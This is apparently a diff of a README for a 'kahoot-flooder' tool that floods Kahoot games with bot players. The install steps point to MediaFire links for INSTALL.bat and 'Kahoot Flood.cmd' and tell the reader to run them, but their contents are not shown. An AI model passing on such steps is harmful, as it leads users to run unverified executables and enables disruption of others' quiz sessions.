Pekgame/kahoot-flooder/README.md

 https://download1074.mediafire.com/2mh3pdzjnjqg/06eeegqvv8jv1h4/INSTALL.bat

+also this!

 https://download1351.mediafire.com/vp1rlebln2ug/o3yo8gq82t81bnb/Kahoot+Flood.cmd

 7. Move those file to same location that you save the flooder.js file(Ex.
 [LOCATION_FROM_STEP_5]/[NAME_OF_THE_FILE(Normal name is Kahoot-Flooder-main)])

-8. Click the file that name **INSTALL.bat** first
+8. Click the file that name INSTALL.bat first, then click the second file!

-9. Run Kahoot **Flood.cmd** file or **Kahoot Flood.exe** file

-**Don't close cmd yet just Minimize it, don't close it until the bot is sended!**
+***Don't close cmd yet just Minimize it, don't close it until the bot is sended!***

-10. Type Kahoot! pin and numbers of bots!
+9. Type Kahoot! pin and numbers of bots!

-11. Now you can close cmd and the website!
+10. Now you can close cmd and the website!